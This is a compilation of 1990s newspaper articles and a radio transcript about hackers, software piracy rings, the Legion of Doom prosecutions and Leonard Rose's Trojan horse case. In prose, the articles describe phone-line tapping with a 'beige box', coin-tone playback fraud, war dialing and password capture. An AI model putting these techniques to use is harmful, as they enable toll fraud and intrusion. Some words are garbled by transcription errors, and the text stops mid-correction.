    principles governing a group, a complex of moral held rules of conduct 
    followed by an individual or group and if you're ethical, ok, is that if
    you're upholding these rules, the standards of a profession. And I beg to 
    argue with you. Now, I've programmed. I, I have a degree in programming.
    I've had to program for Fortune companies in my life. I mean, you know, 
    I...now this is all...me being on radio just didn't happen overnight I've 
    worked for IBM. I've worked for ATT. I've worked for Unisys. In different 
    capacities. Now, I know that there's standards for computing.
MY: Uhuh.
KK: There are various bodies of conduct. Anything from where to put the pick 
    statements in a Cobol program, alright?
MY: Right.
KK: To ah...
MY: I'm a Cobol programmer, I know what you're talking about.
KK: Yeah, and They're a pain, right? Those pick statements...I hate em.
MY: Heh...
MR: I hate Cobol.
MY: I guess the, ah, the keyword in that was a group, followed by a group. I 
    guess we could safely say that our ethics, obviously, ah...I'm not gonna...
    When I say ours, I don't mean MR's and mine, I mean the ethics of the whole
    hacker community, and its not a small community either. We're talking 
    about thousands of people. I wouldn't say millions.
KK: Ok, but...but do you think its ok if, if a group of people... Do you think
    its ethical for a group of people to look inside my bedroom window?
MR: That's a different situation actually. 
KK: Why...
MR: That is your bedroom window. That is your house.
KK: Ok, but my, but my computer
MY: I don't know. It depends... Are you changing your clothes with the window
    open?
KK: Oh, So if I have the window open, its ok.
MR: <laughs>
MY: I mean, Well, don't blame me if I drive by and if I look and see you 
    standing there. Its the same thing, if people leave their systems wide open.
    Ah...and I'm not saying blame them. I'm saying there, ah, that we provide 
    a service, and its agreed, its not a service that a lot of people like to...
KK: You're unethical. You're unethical.
MY: In your terms of ethics, yes. I'm not.
KK: Ok, then say it. In my terms...
MY: In your terms I am not ethical.
KK: You are not ethical.
MY: Right. Because you obviously follow a different set of ethics than I...
KK: I, I follow what the dictionary says. And I say what the world...
MY: No, the dictionary said group, and your group and my group are not the 
    same group.
KK: Alrightie... Well we're gonna, we're gonna, you guys hang...you guys are
    gonna hang around for a couple more minutes. And, ah, the Hell's Angels 
    aren't very ethical sometimes either, but anyway, I'm Kim Kommando here 
    on...
MY: Great bunch of guys though...
MR: <laughs>
KK: ...910 KFYI. And ah, Daryl, Tom, Steve you hang on the line. we're gonna 
    be getting to your phone calls after the, ah, news, here, at the top of 
    the hour.

Exit Music...

<commercial break and news at the top of the hour>

<This is the end of segment two.>
LOS ANGELES TIMES: THURSDAY, NOVEMBER 3, 1994
Front page (A1), left column - article continuing onto page A18.
---------------------------------------------
COLUMN ONE - TITLE: "The Pirates of the Internet"
Subtitle: "As the global computer network grows so do the rings of thieves
          who use it to steal software.  Frustrated security experts say they
          may have to resort to bounty hunters."

By: Adam S. Bauman (nickname "reporter")
Contact: 1-800-528-4637 extension 73492
---------------------------------------------

	In the early hours of July 6, Jenny, head of a software piracy 
ring based in the Pacific Northwest, paced impatiently in front of a rack 
of high-speed personal computers, waiting for the phone call that would 
make her a superstar in the pirate underground.
	It would come from an employee of LucasArts Entertainment Co. in 
San Rafael, who for $300 would supply Jenny's pirate group with one of 
the most anticipated games of the summer: "TIE Fighter," based on the 
"Star Wars" movie trilogy and priced at about $60 per copy.
	At LucasArts, the employee attached a small cellular modem to the 
back of his PC - a technique that would keep any record of the call off 
the company telephone bill - and dialed.  Within a few minutes, the 
program had arrived in Jenny's computer, lacking only the code keys that 
would make it possible to play the game without an owner's manual.
	Jenny then dialed into the Internet, the global computer network, 
and after taking several deliberate electronic detours she connected with 
a small computer in Moscow.  There, a programming whiz who goes by the 
name "Skipjack" quickly cracked the codes and sent the program back 
across the Internet to "Waves of Warez," a Seattle bulletin board popular 
with software pirates.
	Within 24 hours, "TIE Fighter" would be available to thousands of 
software pirates in major cities around the world - days before its 
official release date of July 20.
	Welcome to the underside of the Internet, where stealing software 
has become highly sophisticated and hotly competitive - pursued more for 
thrills than for money.  It's a world where pirate groups build 
alliances, undertake mergers and sometimes launch all-out battles against 
rivals.
	And, contrary to common stereotypes, it is populated not only by 
nerdy teen-age misfits, but by a curious cross-section of computer 
enthusiasts looking for some dangerous fun.
	Jenny, for example, is a woman whose hobbies include motorcycles 
and collecting rare birds.  The head of a big East Coast-based ring is a 
commercial airline pilot.  Another group leader is a junior studying 
chemical engineering at Carnegie Mellon University in Pittsburgh, Pa.  
Yet another is a grandmother, leader of an elite group called Nokturnal 
Trading Alliance.
	Their activities are, of course, illegal, potential felonies in 
many cases.  And to most denizens of cyberspace, who use the Internet for 
scientific research, legimate commerce and legal forms of entertainment, 
the pirates are common vandals at best.
	Still, a number of pirates agreed to allow a reporter to observe 
their operations - both in person and via computer techniques that make 
it possible to monitor computer activities remotely - on the condition 
that their real names not be used.
	The economic impact of the pirates' activities is difficult to 
measure.  Electronic software theft via the Internet and other on-line 
services accounts for about one-third of the $2.2 billion lost in the 
United States last year as a result of piracy, according to the Business 
Software Alliance, a trade group.  Pirates who mass-produce CD-ROM and 
floppy disks with stolen software pose a much bigger problem.
	But Internet software theft is growing rapidly, along with the 
global network itself.  Even major, mainstream software programs - like 
the new version of IBM's OS/2 operating system - are now routinely 
obtainable for free on the Internet.
	And the pirates' activities have other consequences as well.  
They sometimes invade and effectively disable computers being used for 
scientific research, for example.  And many in the information technology 
industries fear that software theft and other illegal activities are 
giving the Internet a bad name just when it is gaining unprecedented 
popularity.
	Yet stopping the pirates turns out to be a very difficult task.  
Law enforcement agencies, software companies and even indignant 
individuals are stepping up efforts to hunt down electronic lawbreakers, 
but new methods of stealing and distributing stolen software are 
developed every day.

	By design, the Internet lacks any central administrative 
authority, and security procedures aimed at thwarting pirates could 
interfere with the philosophy of free and open communications that is 
integral to the network.  Some suggest the thievery won't be stopped 
until "bounty hunters" are recruited from the pirates' ranks and paid to 
hunt their former cohorts.
	It may be small comfort to the victims, but most of the pirates 
interviewed for this story insisted they were not in it for the money.
	"It was just for the thrill of getting free software or logging 
onto pirate bulletin boards that normal people don't know about," said 
Mike from Seattle, who says he has never earned a dime in his role as a 
"courier" for a pirate group.
	During the interview, conducted in a tidy suburban home that he 
shares with friends, Mike uploaded a new program - "Lode Runner for 
Windows" by Sierra Games - to the Internet from his custom-built 
computer.  He then typed e-mail messages to other couriers notifying them 
of the new game and instructing them to copy it to various pirate sites 
around the world.
	There appear to be about 20 major groups dedicated to software 
piracy, a length Times investigation has found, with names such as Razor 
1911, Tristar Red Sector Inc. (TRSi), Pirates With Attitude (PWA), 
Revolutionizing International Piracy (RIP), Legend, Malice and Anti 
Lamers Foundation (ALF).  The groups vary in size from 20 to 100 members, 
and most have a similar hierarchy: group leaders, senior staff, regional 
coordinators, couriers and members.
	The groups divide into two broad types: releasing groups, which 
arrange for software to be supplied and transferred to local computer 
bulletin board systems, and courier groups, which have a worldwide 
network of members who quickly transfer software from local bulletin 
boards to the Internet for instantaneous worldwide distribution.
	Operators generally pay a pirate group a "donation" of $50 to 
$200 per month to carry that group's software on their bulletin boards.  
The more successful groups boast as many as several dozen affiliated 
bulletin boards.
	The logistics of coordinating these far-flung networks are 
daunting, but the pirates are resourceful.  One crucial communications 
method is the Internet Relay Chat (IRC) system, a kind of citizens' band 
of cyberspace that connects thousands of computer users in 21 countries.  
A particular series of channels, known as "warez" channels, are used both 
for conversation between software pirates and the on-line trading of 
freshly stolen software.
	But the IRC has its limits, and even computer hackers sometimes 
need to talk with each other.
	One method they have developed involves a "beige box," or 
custom-built telephone.  The pirate travels a distance from his or her 
home and taps into the exterior wiring of an apartment building or house 
to arrange a conference call, possibly involing 20 people or more in 
several countries, via an AT&T Alliance Teleconferencing opertor.
	The pirate controls the conference call from a pay phone.  But at 
the end of the month, the person whose line was tapped receives the bill 
- which can run well into five figures.
	Several leaders of software pirating groups also descrived a 
method to avoid charges that involves a special computer program, a pay 
phone and a recordable Hallmark greeting card that contains a small 
computer memory.  The electronic sounds a quarter makes when dropped in a 
pay phone are recorded on the memory chip, then are played back into the 
phone in lieu of depositing money.

	Despite the seeming case with which many pirates stay one step 
ahead of law enforcement, there are plenty of risks - especially for 
those who work in the computer industry.
	On Aug. 3, Cupertino-based Symantec Corp., best known for its 
line of Norton Utility software backup and security products, discovered 
an employee in its Baton Rouge, La., facility running a pirate site on a 
company computer.
	A Symantec source says the company took the unusual step of 
packing the offending computer inside a chilled and shielded container 
and flying it to corporate headquarters in Cupertino for laboratory 
analysis.  The employee - who the source said was motivated by "the 
thrill of being part of the pirate scene" - was fired.
	Last month, Dr. William L Sebok, an astronomer at the University 
of Maryland, announed he had shut down a large pirate site that contained 
more than 500 megabytes of stolen software - enough to fill half a dozen 
personal computer hard disks.  The site had been running on a laboratory 
computer used for processing images from the recent collision of Jupiter 
and the Shoemaker-Levy comet.  The illegal use was detected three weeks 
ago when processing on the computer inexplicably slowed to a crawl.
	Maryland officials tried to trace the thieves back through the 
Internet, but met with little success: Many pirates were found to have 
used computer accounts belonging to university students in Switzerland, 
Spain and Slovenia who were unaware their accounts were being used for 
illicit purposes.
	Still, Sebok says the time he spent tracking the pirates was well
justified.
	"I figured by shutting their site down, I would create a stir for 
[the pirates] that would be worth it for me.  I didn't want to see the 
cockroaches tunneling through our computer system any more," he said.
	Law enforcement officials have grown more vigilant about computer
crime of all types.  A group of special FBI agents now cruises the 
Internet, and many local and state law enforcement agencies have been 
training investigators to root out computer crime.  But software piracy - 
especially involving games - takes a back seat to credit card theft and 
other more destructive crimes.
	Dr.G Gene Spafford, an associate professor at Purdue University 
and a computer security expert, says software manufacturers and trade 
groups like the Software Publishers Assn. may have to resort to frontier 
justice to stem the tide of illicit software being transferred over the 
Internet.

	"Some of these same guys who are out pirating right now could 
very easily turn in the rival groups for a buck or more, and they'll be 
very willing to do so," Spafford said.  He expects to see bounty hunters 
who get paid based on damages recovered or convictions of software 
pirating groups.
	"We are already seeing private detective agencies investigating 
computer break-ins, because the local law enforcement agencies arn't 
equipped," he added.
	Robert Roden, general counsel at LucasArts, said the growth of 
the Internet has made it much easier for people to steal and distribute 
games around the world.  Usually a company sends out cease and desist 
letters to pirates if it can find them, but that has become harder, Roden 
said.
	"If they're stealing 'TIE Fighter' because they love the game, 
the irony in all of it is that they're harming the thing they love," 
Rodden added.  "They're making it more difficult for software companies 
to make these products and survive in the market."
	But the pirates arn't much impressed with that argument.  On July 
14, a 20-year-old pirate nicknamed Drizzt took a morning drive from his 
home in the San Fernando Valley to Babbage's computer retail store at the 
Glendale Galleria.  He wanted to check if LucasArts' "TIE Fighter" game 
had come yet.
	Glancing inside, Drizzt could see the game had not arrived.  On a 
shelf near the front of the store stood empty "TIE Fighter" boxes, gaily 
decorated with ribbons that said "coming soon."
	Drizzt recalls laughing at the sight of those empty boxes.  "The 
funny thing was," he later told a reporter, "I'd been playing that game 
for the last seven days.  I'd downloaded it off the Internet, I didn't 
have to pay for it, I was up to the sixth mission and it worked great."

        This article appeared in the August 22,1990 Wall Street Journal

                                  Open Sesame
                                --------------
       In the Arcane Culture Of Computer Hackers, Few Doors Stay Closed
                                --------------
              Frank Darden Easily Broke Into BellSouth's Network
                           Trading Tips With Others
                                --------------
                          Entering the Legion of Doom
                                --------------
          By John R. Wilke, staff reporter of The Wall Street Journal


    ATLANTA- Frank Darden got his first  computer  at  the  age  of  16,  a
    Christmas  present  from his parents. Sitting on a desk in his bedroom,
    it opened a window on a world he found so consuming that he  quit  high
    school and spent most days and nights at the keyboard.

    His  parents  often  wondered what their son found so compelling in the
    endless hours he spent alone in  his  room.  Then  one  afternoon  last
    summer,  a dozen Secret Service agents burst into the family's suburban
    home.  Agents held Edward and Lou Darden at gunpoint  as  they  swarmed
    into  their  son's  room,  seizing  scores of disks mloads of files and
    three computers.

    When Frank got home an hour later, the terrified  young  man  confessed
    that  he  had  used  his  home computer to break into BellSouth Corp.'s
    telephone network.  In  February,  Mr.   Darden  and  two  others  were
    indicted on felony charges of conspiracy and wire fraud.

    "I  guess  now  my  parents  know  what I was doing in my room." says a
    remorseful  Mr.   Darden,  a   bright,   impatient   24-year-old   with
    shoulder-length hair and a tie-dyed T-shirt.

                             Just Passing Through

    Mr.   Darden  thus  became  another  of the growing number of "hackers"
    nabbed by federal agents. For a long time, these high-tech  trespassers
    operated  in  relative obscurity, using their computers and phone lines
    to go where few people were meant to go. But lately,  in  a  string  of
    highly  publicized  cases,  hacking  has moved towards the forefront of
    white-collar crime. Increasingly, banks, businesses, credit bureaus and
    telephone companies are discovering that someone, often in the dead  of
    night, has wandered into their computer systems- and left his mark.

    As  Mr.   Darden's  experience  reveals,  hacking has developed its own
    subculture, rich with literature and legend and peopled  by  electronic
    vandals,  voyeurs  and  explorers  known  by  fanciful code names. "Any
    business that has a computer hooked to a phone  is  vulnerable,"  warns
    Mr.   Darden,  who calls himself the "The Leftist." Before the bust, he
    was one of the best.

                                Starting Early

    An early target in the crackdown was  the  Legion  of  Doom,  an  elite
    clique  of  hackers  that  included  Mr. Darden and was targeted by the
    Secret Service because of its members' notable skills. "The  Legion  of
    Doom  had  the power to jeopardize the entire phonetwork," says Kent B.
    Alexander, an assistant U.S. attorney prosecuting Mr. Darden's case  in
    Atlanta.

    In  a Secret Service affidavit filed in U.S. District Court in Atlanta,
    BellSouth investigators call the Legion of Doom  "a  severe  threat  to
    U.S.   financial  and  telecommunications  industries."  Federal agents
    suspect the Legion  was  responsible  for  software  "  time  bombs"  -
    destructive programs designed to shut down major switching hubs-planted
    in  telephone  company  computers in Denver, Atlanta and New Jersy last
    year.  The programs were defused before causing  damage,  investigators
    say,   but  the  intrusions,  which  weren't  disclosed  by  the  phone
    companies, could have knocked out service to hundreds of  thousands  of
    customer phone lines.

    The government sweep so far has bagged a motley band, mostly loners and
    young  rebels  in their teens or early twenties. In past cases, many of
    the hackers who have admitted breaking  into  computers  have  insisted
    that  they  didn't  damage the systems they penetrated. They did it for
    sport.

    "There's no thrill quite the same as getting into your  first  system,"
    says Phrack, an electronic magazine run out of a University of Missouri
    dorm  and  accessed  by  computer. Before it was shutdown in the latest
    sweep, Phrack (for phone-freak  hacking)  published  tips  on  cracking
    computer  security. One issue offers a "hacker's code of ethics," which
    advises, "Do not intentionally damage any system" or alter files "other
    than the ones you need to ensure your escape." Another rule: "Don't  be
    afraid  to be paranoid. Remember, you are braking the law." Mr.  Darden
    says he strictly adhered to the code.

    But the hackers' creed  means  nothing  in  court.  There,  hacking  is
    treated  much  like  any  other  form  of criminal trespass under a law
    Congress passed in 1988.  The law persuaded many hackers to  end  their
    illicit forays. But it turned other hobbyists into criminals.

    During  his  hacker days, Mr. Darden's world was an oddly solitary one.
    For hours on end he sat in front of the computer  screen,  finding  his
    only  human  contact  in  the  words  and  arcane code that arrived via
    computer from other hackers.  "Once he got into ubject,  there  was  no
    stopping,"   recalls  his  mother.   "he  was  always  studying  up  on
    something. He read encyclopedias as a pastime."

    Geography was meaningless; friends from around the world  were  just  a
    few  keystrokes  away,  thanks to modems that connect computers through
    the phone lines.  Mr.  Darden  says  he  has  struck  up  many  lasting
    friendships on-line with people he has never met in person.

    In  this silent, cerebral world, age is also irrelevant.  Only computer
    skills count.  Once on-line, a hacker can be anyone he or she wants  to
    be.  "No  one knows if you're fat, pimply, or scared to talk to girls,"
    says Sheldon Zenner, a Chicago attorney w recently defended  an  editor
    of  Phrack  on  felony  wire-fraud charges.  "Suddenly you're no longer
    just the shy adolescent, but Knight Lightning or The Prophet."

                                 Tough Choice

    "It's a compulsion for some of these people," adds Mr.  Alexander,  the
    Atlanta  prosecutor. "I'm convinced that if Lotus 1-2-3 was behind Door
    No.  1, and Cheryl Tiegs was standing behind Door No. 2, a hacker would
    go for the software.

    Mr. Darden recounts his hacking days with disapproval- and just a touch
    of pride.  He broke into his first system at the age of 17, dialing his
    way into a big  computer  at  Hayes  Microcomputer  Products  Inc.,  in
    Norcross,  Ga.,  and nosing around the system I didn't take anything, I
    was just trying to see if  it  could  be  done,"  he  says  now.  Hayes
    uncovered the breach and quickly tightened security, he says.

    Hacking sessions often stretched into the early morning hours. He would
    start  by  checking  lists  of  computer phone numbers collected by his
    computer the night before through  an  automatic  process  called  "war
    dialing."  That's  the  brute force approach to king, when the computer
    runs  through  the  night,  methodically  dialing  every  number  in  a
    telephone  exchange.  It records the number whenever it hits a "carrier
    tone" signaling a computer is on the other end.

    In a typical night of war dialing, in which the  computer  might  check
    thousands  of  numbers,  perhaps  100  computer  carrier tones would be
    unearthed, "each one a potential treasure chest," Mr. Darden  says.  He
    would  then  begin  calling down the "hit list" with his computer, each
    time trying to determine what kind of system was on the other end.  Fax
    machines  were  a  problem, because they emit a tone that sounds like a
    computer, so he wrote software that ignored them.

                             Hello, Are You There?

    Each kind of computer had a distinctive response to  his  call,  so  he
    would  tailor  his  approach  to  the  type  of  system he encountered.
    Computers that used the Unix software operating system were  especially
    easy  to  break  into,  while  Digital Equipment Corp.'s VAX computers,
    which have multiple levels of security, presented a  bigger  challenge.
    But he says he was fond of the VAX because of its widely used software.
    "For a hacker, the VAX is like putting on an old Jimi Hendrix record in
    a  bar-  it's  a  real  clasic."  Using purloined telephone credit-card
    numbers, which his computer generated through a trial and error, he got
    into computers all over the world, including an encounter  with  a  VAX
    that spoke Finnish.

    He  devised  password-cracking  programs  that  automated  the  hacking
    process. He also devised a program  that  let  him  capture  legitimate
    users'  passwords  as  they  logged  onto  the  system. When he found a
    password the  target  computer  recognized,  his  screen  wo  typically
    respond  with a prompt, such as a sign. "Once you get that, you have an
    open door," he says. Often he would play "cat-and-mouse games"  with  a
    company's  computer  operators.   "I'd  send a little greeting to their
    printer, to let them know I was there. It drove them crazy."

    Credit bureaus were a favorite target. And,  despite  the  warnings  of
    other  hackers  that it might give him away, his first move was to look
    up his own credit report. "Naturally, I didn't have one," he says.   He
    found his parents' report, and looked up ot s for friends.

    To  make  the  process  more efficient, and to show off, Mr. Darden and
    other hackers traded phone numbers and system-cracking tips  on  pirate
    "bulletin  boards"-  computer  systems  that store and forward text and
    electronic mail over phone  lines.  "Black  Ice"  is  one  such  board.
    Access was tightly limited to an elite circle.

                              No Busy Signal Here

    Mr.  Darden's  biggest thrill as a hacker- and ultimately his downfall-
    came when he broke into a big BellSouth computer  in  Atlanta  used  by
    technicians to maintain and control the phone system. He learned how to
    navigate  within  the  system  by  asking questions of BellSouth's own
    on-line "help" program. Once inside, he found he  had  the  ability  to
    reroute  telephone  calls  or  bring down switching centers, neither of
    which he says he did. Mr. Darden did, however, listen in on a few phone
    lines, but only those of other hackers, he insists, and only  to  prove
    his prowess.

    "If  we  wanted  to,  we  could  have  knocked  out  service across the
    Southeastern U.S.," he says. "The  fact  that  I  could  get  into  the
    system amazed me. But we were careful not to damage anything."

    Not  surprisingly,  when  BellSouth  discovered  hackers were rummaging
    through its computer, it reacted swiftly. It put  42  investigators  on
    the  task of tracking the intruders down, and spent $1.5 million on the
    effort. Once it found the source  of  the  intrusions,  it  called  the
    Secret Service, which enforces computer-crime laws.

    In  the  indictment, Mr. Darden and two co-defendants, Robert J. Riggs,
    21, a.k.a. The Prophet, and Adam E. Grant, 22, a.k.a. The Urvile,  were
    charged  with  taking  copies  of  proprietary software from BellSouth
    during their ramblings in the system, and with unauthorized  intrusion,
    possessing  illegal  phone  credit-card numbers with intent to defraud,
    and conspiracy. Messrs. Darden and Riggs pleaded guilty  to  conspiracy
    and  face  a  maximum  of five years in prison and a $250,000 fine. Mr.
    Grant pleaded guilty to possessing BellSouth computer access codes with
    the intent to defraud and faces a maximum of 10 years in prison  and  a
    $250,000 fine. Sentencing is scheduled for Sept. 14.

    The only good thing to come out of the  whole  experience,  Mr.  Darden
    muses,  is that after he was indicted, his high-school sweetheart- whom
    he often spurned in favor of his  computer-  saw  his  picture  on  the
    front page of the local paper and got back in ch.

    Mr.  Darden,  who  now  works  installing  systems for a local computer
    company, views himself as a purist, hacking for the thrill of exploring
    the forbidden. He looks down on those who use their  skills  simply  to
    steal  phone and credit-card numbers. But in thi s game, information is
    everything, and not even Mr. Darden  can  control  its  spread.  During
    their sweep, federal agents have found some hackers using code-cracking
    information  dug  up  by  the  Legion  of  Doom to perpetrate their own
    practical jokes and fraud.

    For  a  few  days  last  year,  for  example, phone calls to the Delray
    Beach,  Fla.,  probation  office  were  mysteriously  rerouted   to   a
    dial-a-porn  line  in New York. Secret Service agents say it's the kind
    of thing the Legion might have done.

    And in Elwood, Ind., a 15-year-old calling himself  Fry  Guy  allegedly
    used  information  he  got  from  the  Legion to carry out an elaborate
    fraud. Secret Service agents say he used his computer to break  into  a
    credit  rating service in Maryland to pilfer VISA and MasterCard credit
    information. He then entered BellSouth's control network and altered  a
    pay  phone  on  a  street corner in nearby Paducah, Ky., to residential
    status. Next, he called  Western  Union  and  had  cash  wired  out  of
    credit-card accounts to the Pa ducah Western Union office. When Western
    Union  called  the  credit-card holders to verify the transactions, the
    calls were forwarded to the pay phone and  then  to  the  youth's  home
    phone, where he posed as the credit-card holders and gave approval. The
    cash  w  as  then  picked up at the Western Union window, investigators
    say.

    In  all,  Fry Guy siphoned more than $10,000 in cash and purchases from
    credit-card accounts, alleges William M. Gleason,  the  Secret  Service
    investigator.  He  also  found evidence that Fry Guy, whose name hasn't
    been released, hacked his  way  into  a  payrol computer  for  a  local
    McDonalds  Corp.  outlet,  giving  pay raises to his friends working at
    the restaurant.

    Fry  Guy's  case  is  being  handled  by  state  and  federal  juvenile
    authorities  and,  because of his age, it is unclear what punishment he
    might get. At the very least, his  parents  are  likely  to  watch  the
    family  phone  bill  more  closely.  In  a  recent  meeting  w  federal
    prosecutors, Fry Guy's exasperated father wore a baseball  cap  bearing
    the legend "Kids: They'll drive you crazy."

    Federal  agents  admit  that,  when  they  detect  an intruder inside a
    computer, there isn't any way of telling if it's a precocious  teenager
    or a crook out to commit fraud. So they simply execute the law.

    "When  a  hacker  gets  into a system, it's no different from a burglar
    breaking into your home or office," says  Secret  Service  agent  James
    Cool.  If the door is open, the law treats a trespasser differently, he
    adds. But if a hacker cracks a password to g into a system,  "it's  the
    same as kicking in a locked door- and we're going to come after them."

    Ed  Darden  wishes he had known all of this before he gave his son that
    Apple II for Christmas eight years ago. "I'd have thought  twice  about
    it," he says. "Maybe we should have given him a bicycle."



                                 *end of file*





Here is some interesting news that appeared in the August 15, 1991
edition of the 'HOUSTON CHRONICLE'.  It involved the now defunct
hacking group the 'Legion of Doom', who as you recall was busted in the
'Operation SunDevil' raids last Summer.

--------------------------------------------------------------------------


EX-HACKERS' TACTICS ATTRACTING CRITICISM

Houston computer-security experts up to their old tricks, executive says

------------
Joe Abernathy
Houston Chronicle
------------

        A new computer-security consulting firm run by members of a once
notorious nationwide hackers' group is facing heat for what a technology
executive sees as a return to the ways of the computer underground.
        Comsec Data Security, a Houston-based firm recently incorporated by
reformed members of the defunct Legion of Doom, counters that the attack is
an attempt by competitors to discredit the company.
        Scott Chasin, a Comsec principal, acknowledged that he and his
colleagues surveyed competing firms by posing as prospective customers.
        But he emphatically denied that the activity included unauthorized
access to comuter systems.
        "It was not a Legion of Doom operation, it was not some big
clandestine thing," Chasin said.  "It's called shopping for yoour
competitors, that's what it's called, competitive shopping, and thats what
we did.  But some of these consultants that have been in the industry, some
of the dinosuars, got upset."
        To survey the pricing and services offered by its competition,
Comsec called security consulting firms around the nation, representing
itself as an unrelated company with a hacker problem.
        They said they were from Landmark Graphics, a real Houston
technology company with a real hacker problem - one it didn't know about at
the time.  They gave out information regarding Landmark's computer system
that the company says wasn't publicly available.
        Chasin said the computer system they described was generic and was
drawn from their knowledge of such systems but not from any unauthorized
information about Landmark.
        But Landmark chief financial officer Hardie Morgan questioned the
ethics of the Comsec survey, regardless of whether it included hacking.
        "My thoughts are that in effect they haven't changed their way of
doing business," he said.
        Morgan said Comsec representatives asked security firms to send
information, and left a phone number and address.  "Most of those firms
followed u pand got a constant busy signal," he said.  The address was the
home of a Comsec principal.
        But the phone number belonged to Southwestern Bell.
        "That is a number that is utilized by Southwestern Bell for testing
various and sundry equipment," said Bill Ray, general security manager for
the phone company.  "It's what's called a permanent busy.  How they came
about having that number, I have no idea.  I doubt that they hacked it."
        The Comsec members said they didn't know to whom the phone number
belonged, only that it always gave a busy signal.
        Morgan said the company has performed a full security evaluation.
        "We did find some weaknesses in out security, particularly as it
related to our connection to the Internet," a nationwide network that is a
favorite haunt of computer enthusiast, Morgan said.  "We found that people
were using an unsecured line we had as jumping-off point into the
Internet."
        Chasin contends competing firms are engineering publicity about the
Landmark incident.
        "We think it's a plot to get us out of the business," he said.
        The matter ws brought to the Chronicle's attention by a third
party.
        Chasin said the Comsec members now regret their "comparison
shopping" but defend it as standard business practice.
        Ray and Morgan took issue with that.
        "Their position is that this is standard operating procedure, and I
can tell you that is not true," Morgan said.  "Their concern is that this
is wrecking their business. I said they should have thought about that
before."



August 15, 1991.

        *** DANSE MACABRE *** (713) 324-2139 *** DANSE MACABRE ***
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::: DEVIL'S TRIANGLE  4 0 7 - 5 7 1 - 1 0 7 5 ::::::::::::::::
:::::::::::::::::::::::: INDEPENDENTLY FAST !! :::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       "'Hacker' Pleads Guilty in AT&T CASE: Sentence Urged for
            Md. Man Among Stiffest Yet for Computer Crime"
              By Mark Potts/Washington Post Staff Writer

BALTIMORE, March 22--A computer "hacker" who was trying to help others
steal electronic passwords guarding large corporate computer systems
around the country today pleaded guilty to wire fraud in a continuing
government crackdown on computer crime.

Federal prosecutors recommended that Leonard Rose Jr., 32, of
Middletown, Md., be sent to prison for one year and one day, which
would be one of the stiffest sentences imposed to date for computer
crime. Sentencing is scheduled for May before U.S. District Judge J.
Frederick Motz.

Cases such as those of Rose and a Cornell University graduate student
who was convicted last year of crippling a nationwide computer network
have shown that the formerly innocent pastime of hacking has
potentially extreme economic ramifictions. Prosecutors, industry
officials and even some veteran hackers now question the once popular
and widely accepted practice of breaking into computer systems and
networks in search of information that can be shared with others.

"It's just like any other form of theft, except that it's more subtle
and it's more sophisticated," said Geoffrey R. Garinther, the
assistant U.S. attorney who prosecuted the Rose case.

Rose--once part of a group of maverick hackers who called themselves
the Legion of Doom--and his attorneys were not available for comment
after the guilty plea today. The single fraud count replaced a
five-count indictment of the computer programmer that was issued last
May after a raid on his home by Secret Service agents.

According to prosecutors, Rose illegally obtained information that
would permit him to secretly modify a widely used American Telephone &

(See HACKER, A10, Col 1)

Telegraph Co. Unix software program--the complex instructions that
tell computers what to do. The two former AT&T software emplyees who
provided these information "codes" have not yet been prosecuted.

Rose altered the AT&T software by inserting a "Trojan horse" program
that would allow a hacker to secretly gain access to the computer
systems usng the AT&T Unix softare and gather passwords used on the
system. The passwords could then be distributed to other hackers,
permitting them to use the system without the knowledge of its
rightful operators, prosecutors said.

Rose's modifications made corporate purchasers of the $77,000 AT&T
Unix program vulnerable to electronic break-ins and the theft of such
services as toll-free 800 numbers and other computer-based
telecommunications services.

After changing the software, Rose sent it to three other computer
hackers, including one in Chicago, where authorities learned of the
scheme through a Secret Service computer crime investigation called
Operation Sun Devil. Officials  say they do not believe the hackers
ever broke into computer systems.

At the same time he pleaded guilty here, Rose pleaded guilty to a
similar charge in Chicago; the sentences are to be served
concurrently, and he will be eligible for parole after 10 months.

Rose and his associates in the Legion of Doom, whose nickname was
taken from a gang of comic-book villains, used names like Acid Phreak
Terminus--Rose's nickname--as their computer IDs. They connected their
computers by telephone to corporate and government computer networks,
outwitted security screens and passwords to sign onto the systems and
rummaged through the information files they found, prosecutors said.

Members of the group were constantly testing the boundaries of the
"hacker ethic," a code of conduct dating back to the early 1960s that
operates on the belief that computers and the information on them
should be free for everyone to share, and that such freedom would
accelerate the spread of computer technology, to society's benefit.

Corporate and government computer information managers and many law
enforcement officials have a different view of the hackers.  To them,
the hackers are committing theft and computer fraud.

After the first federal law aimed at computer fraud was enacted in
1986, the Secret Service began the Operation Sun Devil investigation,
which has since swept up many members of the Legion of Doom, including
Rose. The investigation has resulted in the arrest and prosecution of
several hackers and led to the confiscation of dozens of computers,
thousands of computer disks and related items.

"We're authorized to enforce the computer fraud act, and we're doing
it to the best of our ability," Garry Jenkins, assistant director of
investigations for the Secret Service, said last summer.  "We're not
interested in cases that are at the lowest threshold of violating the
law...They have to be major criminal violations before we get
involved."

The Secret Service crackdown closely followed the prosecution of the
most celebrated hacker case to date, that of Robert Tappan Morris
Cornell Univesity computer science graduate student and son of a
computer sicentist at the Natonal Security Agency. Morris was
convicted early last year of infecting a vast nationawide computer
network in 1988 with a hugely disruptive computer "virus," or rogue
instructions. Although he could have gone to jail for five years, Mo
$10,000, given three years probation and ordered to do 400 hours of
community service work.

Through Operation Sun Devil and the Morris case, law enforcement
authorities have begun to define the boundaries of computer law.
Officials are grappling with how best to punish hackers and how to
differentiate between mere computer pranks and serious computer
espionage.

"We're all trying to get a handle for what is appropriate behavior in
this new age, where we have computers and computer networks linked
together," said Lance Hoffman, a computer science professor at George
Washington University.

"There clearly are a bunch of people feeling their way in various
respects," said David R. Johnson, an attorney at Wilmer, Cutler &
Pickering and an expert on computer law.  However, he said, "Things
are getting a lot clearer. It used to be a reasonably respectable
argument that people gaining unauthorized access to computer systems
and causing problems were just rambunctious youth." Now, however, the
feeling is that "operating in unauthorized computing spaces can be an
antisocial act," he said.

Although this view is increasingly shared by industry leaders, some
see the risk of the crackdown on hackers going to far. Among those
concerned is Mitch Kapor, the inventor of Lotus 1-2-3, the
best-selling computer "spreadsheet" program for carrying out
mathematical and accounting analysis.  Kapor and several other
computer pioneers last year contributed several hundred thousands
dollars to set up the Electron Freedom Foundation, a defense fund for
computer hackers.

EFF has funded much of Rose's defense and filed a friend-of-the-court
brief protesting Rose's indictment.

                          --end of article--

From: The Washington Post, Tuesday March 26, 1991, Page A3.

CORRECTION [to Saturday March 23, 1991 article]

"Leonard Rose, Jr., the Maryland computer hacker who pleaded guilty
